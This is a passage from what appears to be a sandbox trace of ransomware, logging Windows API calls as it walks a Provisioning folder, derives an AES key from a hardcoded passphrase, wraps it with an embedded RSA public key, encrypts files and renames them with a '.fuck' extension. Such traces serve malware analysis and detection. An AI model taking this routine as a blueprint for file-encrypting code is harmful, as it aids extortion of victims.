returned 0xffffffff [0239.850] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\countrytable.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\countrytable.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.850] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\countrytable.xml.gsg", dwFileAttributes=0x2) returned 0 [0239.851] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x28d4d60) returned 1 [0239.853] CryptCreateHash (in: hProv=0x28d4d60, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0239.853] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0239.853] CryptHashData (hHash=0x28bf018, pbData=0x2ec6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.853] CryptDeriveKey (in: hProv=0x28d4d60, Algid=0x6610, hBaseData=0x28bf018, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x28bf218) returned 1 [0239.853] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.853] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0239.853] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x28d65d0) returned 1 [0239.854] CryptImportPublicKeyInfo (in: hCryptProv=0x28d65d0, dwCertEncodingType=0x1, pInfo=0x28c90b8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28c90e8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28c90f0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x28be2d8) returned 1 [0239.854] CryptEncrypt (in: hKey=0x28be2d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0239.854] CryptEncrypt (in: hKey=0x28be2d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d5ee8*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x28d5ee8*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0239.854] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28d5ee8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0239.855] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0239.855] CryptEncrypt (in: hKey=0x28bf218, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0239.855] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0239.855] CloseHandle (hObject=0xffffffff) returned 1 [0239.855] CloseHandle (hObject=0xffffffff) returned 1 [0239.855] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\countrytable.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\countrytable.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\countrytable.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\countrytable.xml"), bFailIfExists=0) returned 0 [0239.855] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\countrytable.xml", dwFileAttributes=0x0) returned 0 [0239.856] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\countrytable.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\countrytable.xml.gsg")) returned 0 [0239.856] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\countrytable.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\countrytable.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\countrytable.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\countrytable.xml.fuck")) returned 0 [0239.857] CryptDestroyHash (hHash=0x28bf018) returned 1 [0239.857] CryptDestroyKey (hKey=0x28bf218) returned 1 [0239.857] CryptReleaseContext (hProv=0x28d4d60, dwFlags=0x0) returned 1 [0239.857] FindNextFileA (in: hFindFile=0x28bf1d8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0239.857] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x28bf218 [0239.857] FindNextFileA (in: hFindFile=0x28bf218, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.857] FindNextFileA (in: hFindFile=0x28bf218, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.857] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0239.857] GetLastError () returned 0x5 [0239.857] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\customizations.xml")) returned 0x20 [0239.858] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\customizations.xml", dwFileAttributes=0x80) returned 0 [0239.858] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\customizations.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.859] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\customizations.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\customizations.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.859] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\customizations.xml.gsg", dwFileAttributes=0x2) returned 0 [0239.859] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x28d4d60) returned 1 [0239.862] CryptCreateHash (in: hProv=0x28d4d60, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0239.862] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0239.862] CryptHashData (hHash=0x28bf018, pbData=0x27e2380, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.862] CryptDeriveKey (in: hProv=0x28d4d60, Algid=0x6610, hBaseData=0x28bf018, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x28be898) returned 1 [0239.862] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.862] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0239.862] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28d6768) returned 1 [0239.863] CryptImportPublicKeyInfo (in: hCryptProv=0x28d6768, dwCertEncodingType=0x1, pInfo=0x28ca5d8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28ca608*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28ca610*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x28be318) returned 1 [0239.863] CryptEncrypt (in: hKey=0x28be318, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0239.863] CryptEncrypt (in: hKey=0x28be318, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d6cb8*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x28d6cb8*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0239.863] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28d6cb8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.863] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0239.863] CryptEncrypt (in: hKey=0x28be898, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0239.863] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.863] CloseHandle (hObject=0xffffffff) returned 1 [0239.863] CloseHandle (hObject=0xffffffff) returned 1 [0239.863] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\customizations.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\customizations.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\customizations.xml"), bFailIfExists=0) returned 0 [0239.864] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\customizations.xml", dwFileAttributes=0x0) returned 0 [0239.864] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\customizations.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\customizations.xml.gsg")) returned 0 [0239.865] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\customizations.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\customizations.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\customizations.xml.fuck")) returned 0 [0239.865] CryptDestroyHash (hHash=0x28bf018) returned 1 [0239.865] CryptDestroyKey (hKey=0x28be898) returned 1 [0239.865] CryptReleaseContext (hProv=0x28d4d60, dwFlags=0x0) returned 1 [0239.865] FindNextFileA (in: hFindFile=0x28bf218, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.865] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0239.865] GetLastError () returned 0x5 [0239.866] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\MasterDatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\masterdatastore.xml")) returned 0x20 [0239.866] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\MasterDatastore.xml", dwFileAttributes=0x80) returned 0 [0239.866] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\MasterDatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\masterdatastore.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.867] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\MasterDatastore.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\masterdatastore.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.867] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\MasterDatastore.xml.gsg", dwFileAttributes=0x2) returned 0 [0239.867] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x28d4d60) returned 1 [0239.871] CryptCreateHash (in: hProv=0x28d4d60, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0239.871] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0239.871] CryptHashData (hHash=0x28bf018, pbData=0x2857358, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.871] CryptDeriveKey (in: hProv=0x28d4d60, Algid=0x6610, hBaseData=0x28bf018, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x28be398) returned 1 [0239.871] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.871] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0239.871] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28d5d50) returned 1 [0239.872] CryptImportPublicKeyInfo (in: hCryptProv=0x28d5d50, dwCertEncodingType=0x1, pInfo=0x28c9188*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28c91b8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28c91c0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x28be618) returned 1 [0239.872] CryptEncrypt (in: hKey=0x28be618, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0239.872] CryptEncrypt (in: hKey=0x28be618, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d67f0*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x28d67f0*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0239.872] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28d67f0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.872] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0239.872] CryptEncrypt (in: hKey=0x28be398, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0239.872] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.872] CloseHandle (hObject=0xffffffff) returned 1 [0239.872] CloseHandle (hObject=0xffffffff) returned 1 [0239.872] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\MasterDatastore.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\masterdatastore.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\MasterDatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\masterdatastore.xml"), bFailIfExists=0) returned 0 [0239.873] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\MasterDatastore.xml", dwFileAttributes=0x0) returned 0 [0239.874] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\MasterDatastore.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\masterdatastore.xml.gsg")) returned 0 [0239.874] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\MasterDatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\masterdatastore.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\MasterDatastore.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\masterdatastore.xml.fuck")) returned 0 [0239.875] CryptDestroyHash (hHash=0x28bf018) returned 1 [0239.875] CryptDestroyKey (hKey=0x28be398) returned 1 [0239.875] CryptReleaseContext (hProv=0x28d4d60, dwFlags=0x0) returned 1 [0239.875] FindNextFileA (in: hFindFile=0x28bf218, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.875] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x28bee18 [0239.875] FindNextFileA (in: hFindFile=0x28bee18, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0239.875] FindNextFileA (in: hFindFile=0x28bee18, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0239.875] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\*.*", lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0x28bf018 [0239.875] FindNextFileA (in: hFindFile=0x28bf018, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0239.875] FindNextFileA (in: hFindFile=0x28bf018, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0239.876] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0239.876] GetLastError () returned 0x5 [0239.876] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\power_0.provxml")) returned 0x20 [0239.876] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\Power_0.provxml", dwFileAttributes=0x80) returned 0 [0239.876] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\power_0.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.877] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\Power_0.provxml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\power_0.provxml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.877] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\Power_0.provxml.gsg", dwFileAttributes=0x2) returned 0 [0239.878] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x28d5dd8) returned 1 [0239.883] CryptCreateHash (in: hProv=0x28d5dd8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0239.883] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0239.883] CryptHashData (hHash=0x28be5d8, pbData=0x28572e0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.883] CryptDeriveKey (in: hProv=0x28d5dd8, Algid=0x6610, hBaseData=0x28be5d8, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x28be658) returned 1 [0239.883] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.883] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0239.883] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x28d6328) returned 1 [0239.884] CryptImportPublicKeyInfo (in: hCryptProv=0x28d6328, 